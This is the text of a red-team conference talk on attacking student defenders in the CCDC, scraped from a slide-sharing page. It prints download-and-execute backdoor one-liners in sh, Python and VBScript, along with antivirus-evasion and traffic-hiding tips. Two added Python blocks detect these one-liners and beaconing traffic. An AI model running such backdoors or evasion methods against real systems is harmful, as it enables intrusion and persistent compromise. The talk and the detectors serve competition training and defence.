Red Teaming the CCDC
hacking the most paranoid student system administrators in the nation
Matt “scriptjunkie” Weeks
Some funny things
Our mistakes and yours
No, don’t start “aCcbsXoAIfRsU”
Those other people logged-in are not your friends.
You planned to get hacked?
This
 VNC
A year of curating red team wallpaper
Gotta keep up with changing memes
The red team has you
Screenshot inception!
Personal Favorite
 https://www.youtube.com/watch?v=TrnUO6TLrtE
The malware games
Challenges writing malware
Requirements
 Full-featured RAT
 File access
 Interactive shell
 Screenshots, keylogger
 May include stealth features
 Basic backdoors
 Used for re-establishing full-featured RAT
 Simple command and/or shellcode execution
 Callback or listening
 Keylogger/persistent monitoring
 File packing tools
 Worms – every method possible
Compatibility is hard
 Windows XP – Win 8.1
 Hook-based keylogging fails…
 *NIX’s make Windows look great
 No two Linux distros start up the same
 OS X(!), NetBSD, OpenBSD, FreeBSD, OpenIndiana (Solaris), Ubuntu, Fedora, Linux Mint
 x64/x86
But hard work pays off, kids
On-the-fly backdoors
 Usually you are caught off-guard with at least one system
 Webshell collections are your friend
 Scripting skills are a must
sh: while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
Python: eval(urllib2.urlopen('http://a.bc/def').read())
cmd/VBScript: echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
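From the defender's side, the three one-liners above share a shape (fetch a URL, hand the body straight to an interpreter, loop) that is cheap to hunt for in process listings and dropped scripts. The scanner below is an added example, not code from the talk; the process listing, the v.vbs body and the rule names are constructed, and http://a.bc/def is the slide's own placeholder URL.

```python
"""Flag download-and-execute one-liners of the kind shown on the slide.

Added example, not code from the talk. The process listing and the v.vbs
body below are constructed; http://a.bc/def is the slide's placeholder.
"""
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    source: str   # "pid 1403" or a file name
    rule: str
    text: str


# One rule per backdoor style on the slide: a shell fetch piped into a
# shell, Python eval() over urlopen(), VBScript XMLHTTP followed by Execute.
RULES = [
    ("fetch_pipe_shell",
     re.compile(r"\b(wget|curl)\b[^|;]*\|\s*(ba|z|da|k)?sh\b")),
    ("python_eval_urlopen",
     re.compile(r"\beval\(\s*urllib2?\.(request\.)?urlopen\(")),
    ("vbs_xmlhttp_execute",
     re.compile(r'CreateObject\("(Microsoft|MSXML2)\.XMLHTTP[^"]*"\).*\bExecute\b',
                re.IGNORECASE)),
]

# An endless re-fetch loop ("while [ true ] ; do ... ; sleep N ; done") is the
# persistence tell; it is reported as a suffix on the matching rule.
LOOP_RE = re.compile(r"\bwhile\s*(\[\s*true\s*\]|true|:)\s*;?\s*do\b")


def scan_text(source: str, text: str) -> List[Finding]:
    """Apply every rule to one artefact (a command line or a script body)."""
    findings = []
    for name, rx in RULES:
        if rx.search(text):
            suffix = "+loop" if LOOP_RE.search(text) else ""
            findings.append(Finding(source, name + suffix, text))
    return findings


def scan_process_list(ps_output: str) -> List[Finding]:
    """Scan 'PID COMMAND' lines such as `ps -eo pid,args` prints."""
    findings = []
    for line in ps_output.strip().splitlines()[1:]:   # skip the header row
        pid, _, cmd = line.strip().partition(" ")
        if pid.isdigit():
            findings.extend(scan_text("pid " + pid, cmd))
    return findings


# Constructed sample data: two benign processes, two on-the-fly backdoors.
SAMPLE_PS = """  PID COMMAND
  812 /usr/sbin/sshd -D
 1403 /bin/sh -c while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
 1410 python -c "eval(urllib2.urlopen('http://a.bc/def').read())"
 1422 wget -O /tmp/update.tar.gz http://mirror.example.test/update.tar.gz
"""

# Constructed: what the echo ... >>v.vbs line on the slide would leave on disk.
SAMPLE_VBS = ('Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET",'
              '"http://a.bc/def",False:x.Send:Execute x.responseText')


def scan_samples() -> List[Finding]:
    """Run both scanners over the constructed samples."""
    return scan_process_list(SAMPLE_PS) + scan_text("v.vbs", SAMPLE_VBS)


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f.source}: {f.rule}: {f.text}")
```

The rules deliberately match the interpreter hand-off rather than the URL, so a renamed payload host does not dodge them; a plain `wget -O file` download is left alone.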
First world red team problems:
I accidentally six or seven keylogger copies
On Antivirus -or- why does everybody use MBAM?
Process
 Write malware → Does AV detect?
  Yes → Look for shady code → Obfuscate functions, strings → test again
  No → Done!
But usually
 Write malware → Does AV detect? → No → Done!
AV test lab
 Top market share AV’s (Internet Security Suite version) on default settings
 7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
Why not VirusTotal?
Test 1: Widely known malware with 1 byte appended
 The only way to fail is by using giant hash lists instead of real signatures
[Results chart: per-product WIN/FAIL verdicts; product labels lost in extraction]
Test 2: Malware with public code samples
[Results chart: per-product verdicts, all FAIL; product labels lost in extraction]
Test 3: One-off malware with no evasions
[Results chart: per-product WIN/FAIL/INDECISIVE verdicts; product labels lost in extraction]
Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse
[Results chart: per-product verdicts, all FAIL; product labels lost in extraction]
Test 5: “The Kraken” – Sneaky firewall-evading malware
[Results chart: per-product WIN/FAIL verdicts, one WIN; product labels lost in extraction]
Test 6: Worm with no evasions
[Results chart: per-product WIN/FAIL verdicts; one product hosed the VM; product labels lost in extraction]
Test 7: Legit program used maliciously
[Results chart: per-product FAIL/INDECISIVE verdicts; product labels lost in extraction]
Notes
 Symantec was only AV to detect reverse meterpreter on the wire
 Kaspersky’s behavioral emulation detected one worm well
 Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist) but not necessarily bad
 Trend Micro was only AV to block hash dumping
 Panda, Avast gave errors installing and were not tested
Final standings
[Standings chart: most products at 100% FAIL, a few rated “meh”, TIED 1st and 3rd; product labels lost in extraction]
Just kidding. After 2 hours obfuscating, these are the real final standings:
[Standings chart: per-product verdicts, all FAIL; product labels lost in extraction]
How do I bypass AV?
 Write your own stuff
 Dynamically resolve API calls
 Obfuscate strings
 Introduce environmental/system dependencies to generically thwart sandboxing
 Write your own stuff
 Impersonate legitimate software
 Watch what hits disk
 Digitally sign your stuff if you can
 Write your own stuff
Security Software Lessons
 Some AV’s are a total fail
 MalwareBytes Pro is in this list with MS, McAfee, F-Secure
 Many have one really cool feature or heuristic
 Kaspersky, Symantec, Trend Micro
 All can be bypassed easily for most malware
 Only detection remaining after 2 hours was one worm vs Kaspersky
Hiding from the students
 Host hiding
 Hide while running
 Hide start
 Meterpreter is great for functionality, bad for persistence
 Mostly custom malware
 Mostly standard persistence methods
 Don’t run in your own process
 Don’t use any of those toy languages with dependencies
 Use C!
Don’t hide stuff rootkit finders look for
Don’t sweat the one-offs
Hiding on the wires
 Hiding from Wireshark
 Harder than hiding on host
 Try to blend in with normal traffic
 Throw Wireshark crashers
 Remove packets from view
 Hiding from netstat/tcpview
 Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
 If that fails, blend in by using common ports and cloud IP’s
 Migrate session to web browser or critical process
Hiding on the wires
 Use every protocol that gets out
 TCP
 UDP
 HTTPS
 DNS
 Use hop points in cloud/web hosting
 Use file sharing/paste/social media sites
 Random callback selection and delays to avoid monitors
 Any way students can send or receive info, you can too
Dealing with firewalls
 Two types
 Host
 Network
 Host firewalls
 Usually don’t stop outbound traffic
 Can go underneath, watch raw packets
 Frequently add exceptions or drop the firewall
Network firewalls
 Great to own
 Tough if you don’t
 Use service ports since they must be able to reach the hosts
Defenses that hurt
 Patch or block RCE’s
 Strict inbound and outbound network firewall rules
 Traffic monitoring
 Different passwords on all the boxes
 Pull the plug
 Reverting (sometimes)
 Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you
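The random callback selection and delays listed under Hiding on the wires are aimed at exactly the traffic monitoring listed here, and the short HTTP(S) callbacks that keep netstat clean are what a connection log sees. As an added example (not code from the talk), a beacon check over such a log that tolerates jitter and, by grouping per source host instead of per destination, also surfaces callbacks rotated across several hosts; the log format, addresses, sample timings and the 0.3 threshold are constructed.

```python
"""Beacon hunting over a connection log, tolerant of random delays and of
callbacks rotated across several hosts.

Added example, not code from the talk. The log format and every line of
SAMPLE_LOG are constructed; the addresses come from documentation ranges.
"""
from statistics import median
from typing import Callable, Dict, Hashable, List, NamedTuple, Optional


class Conn(NamedTuple):
    ts: float
    src: str
    dst: str          # "ip:port"


def parse_log(text: str) -> List[Conn]:
    """Parse constructed 'ts src dst:port' lines, one connection per line."""
    conns = []
    for line in text.strip().splitlines():
        ts, src, dst = line.split()
        conns.append(Conn(float(ts), src, dst))
    return sorted(conns)


def beacon_score(times: List[float], min_intervals: int = 5) -> Optional[float]:
    """Relative dispersion of the gaps between consecutive connections.

    0.0 is perfectly periodic; period P with random +/-N delays scores about
    N/P. Median and median absolute deviation keep a few long gaps (laptop
    lid closed) from masking the rhythm. None: too few connections to judge.
    """
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < min_intervals:
        return None
    med = median(gaps)
    if med <= 0:
        return None
    return median(abs(g - med) for g in gaps) / med


def find_beacons(conns: List[Conn], key: Callable[[Conn], Hashable],
                 threshold: float = 0.3) -> Dict[Hashable, float]:
    """Group connections by `key`; return groups whose timing looks periodic.

    key=per_pair catches a fixed callback host. key=per_src catches rotation
    over several callback hosts: per host the samples are too sparse, per
    source the rhythm is intact. Legitimate pollers (mail clients, update
    checks) are periodic too, so the result is a triage list, not a verdict.
    """
    groups: Dict[Hashable, List[float]] = {}
    for c in conns:
        groups.setdefault(key(c), []).append(c.ts)
    flagged = {}
    for k, times in groups.items():
        score = beacon_score(times)
        if score is not None and score <= threshold:
            flagged[k] = round(score, 3)
    return flagged


def per_pair(c: Conn) -> Hashable:
    return (c.src, c.dst)


def per_src(c: Conn) -> Hashable:
    return c.src


# Constructed log. 10.0.0.5 calls one host every ~60 s with jitter; 10.0.0.7
# calls every ~30 s but rotates over three hosts; 10.0.0.9 is a person browsing.
SAMPLE_LOG = """
0    10.0.0.5 203.0.113.10:443
58   10.0.0.5 203.0.113.10:443
121  10.0.0.5 203.0.113.10:443
177  10.0.0.5 203.0.113.10:443
240  10.0.0.5 203.0.113.10:443
296  10.0.0.5 203.0.113.10:443
361  10.0.0.5 203.0.113.10:443
0    10.0.0.7 198.51.100.20:443
31   10.0.0.7 198.51.100.21:443
59   10.0.0.7 198.51.100.22:80
90   10.0.0.7 198.51.100.20:443
122  10.0.0.7 198.51.100.21:443
149  10.0.0.7 198.51.100.22:80
180  10.0.0.7 198.51.100.20:443
209  10.0.0.7 198.51.100.21:443
241  10.0.0.7 198.51.100.22:80
270  10.0.0.7 198.51.100.20:443
0    10.0.0.9 192.0.2.10:443
1    10.0.0.9 192.0.2.10:443
3    10.0.0.9 192.0.2.50:443
300  10.0.0.9 192.0.2.50:443
305  10.0.0.9 192.0.2.77:80
1200 10.0.0.9 192.0.2.10:443
1203 10.0.0.9 192.0.2.50:443
1207 10.0.0.9 192.0.2.77:80
1900 10.0.0.9 192.0.2.50:443
"""
```

Run per pair, only 10.0.0.5's single callback host is flagged; run per source, 10.0.0.7's rotating callbacks show up as well while the browsing host stays clear.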
Questions
@scriptjunkie1
https://scriptjunkie.us/

Contenu connexe

Tendances

Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityPriyanka Aash
 
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Eric Kolb
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)Sri Prasanna
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedZoltan Balazs
 
Top Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesTop Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesPeter Wood
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockoutJohn Parkinson
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy MechanismsSecuRing
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Hacking with Remote Admin Tools (RAT)
 Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)Zoltan Balazs
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.commariagoel7
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Duo Security
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Paul Haskell-Dowland
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt Baumgartner
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 

Tendances (20)

Defcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-securityDefcon 22-david-wyde-client-side-http-cookie-security
Defcon 22-david-wyde-client-side-http-cookie-security
 
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
Pirates, Bandits, and Ne'erdowells: Practical Protection in the Dangerous Dig...
 
Firewalls (Distributed computing)
Firewalls (Distributed computing)Firewalls (Distributed computing)
Firewalls (Distributed computing)
 
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security System
 
Test & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automatedTest & Tea : ITSEC testing, manual vs automated
Test & Tea : ITSEC testing, manual vs automated
 
Top Five Internal Security Vulnerabilities
Top Five Internal Security VulnerabilitiesTop Five Internal Security Vulnerabilities
Top Five Internal Security Vulnerabilities
 
2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout2014 WordCamp Columbus - Dealing with a lockout
2014 WordCamp Columbus - Dealing with a lockout
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Hacking with Remote Admin Tools (RAT)
 Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
 
How to Delete plus network.com
How to Delete plus network.comHow to Delete plus network.com
How to Delete plus network.com
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
 
Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019Ethical hacking 101 - Singapore RSA 2019
Ethical hacking 101 - Singapore RSA 2019
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012
 
Security
SecuritySecurity
Security
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 

En vedette

Advanced mainframe hacking
Advanced mainframe hackingAdvanced mainframe hacking
Advanced mainframe hackingPhilip Young
 
Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 201244CON
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Andy Robbins
 
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Olga Kochetova
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Introduction to Apache Accumulo
Introduction to Apache AccumuloIntroduction to Apache Accumulo
Introduction to Apache AccumuloJared Winick
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Adventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable FunAdventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable Funarbitrarycode
 
Python Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and GeventPython Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and Geventemptysquare
 

En vedette (9)

Advanced mainframe hacking
Advanced mainframe hackingAdvanced mainframe hacking
Advanced mainframe hacking
 
Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012Modern Post-Exploitation Strategies - 44CON 2012
Modern Post-Exploitation Strategies - 44CON 2012
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
Hack your ATM with friend's Raspberry.Py (Black Hat EU-2014)
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Introduction to Apache Accumulo
Introduction to Apache AccumuloIntroduction to Apache Accumulo
Introduction to Apache Accumulo
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
Adventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable FunAdventures in Femtoland: 350 Yuan for Invaluable Fun
Adventures in Femtoland: 350 Yuan for Invaluable Fun
 
Python Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and GeventPython Performance: Single-threaded, multi-threaded, and Gevent
Python Performance: Single-threaded, multi-threaded, and Gevent
 

Similaire à Red teaming the CCDC

Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
Rob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesRob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesArea41
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
 
Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationTom Eston
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Chaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosChaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosCharity Majors
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encodingtechnology_flow
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Adrian Sanabria
 
JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816Jeff Conrad
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
Securing Rails
Securing RailsSecuring Rails
Securing RailsAlex Payne
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 

Similaire à Red teaming the CCDC (20)

Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
Netforts
Netforts Netforts
Netforts
 
Rob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesRob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost Stories
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
 
Old Linux Security Talk
Old Linux Security TalkOld Linux Security Talk
Old Linux Security Talk
 
Smart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and ExploitationSmart Bombs: Mobile Vulnerability and Exploitation
Smart Bombs: Mobile Vulnerability and Exploitation
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Chaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just ChaosChaos Engineering Without Observability ... Is Just Chaos
Chaos Engineering Without Observability ... Is Just Chaos
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
 
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
Stranded on Infosec Island: Defending the Enterprise with Nothing but Windows...
 
JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816
 
OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
Malware
MalwareMalware
Malware
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
Securing Rails
Securing RailsSecuring Rails
Securing Rails
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 

Dernier

🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Breaking the Kubernetes Kill Chain: Host Path Mount
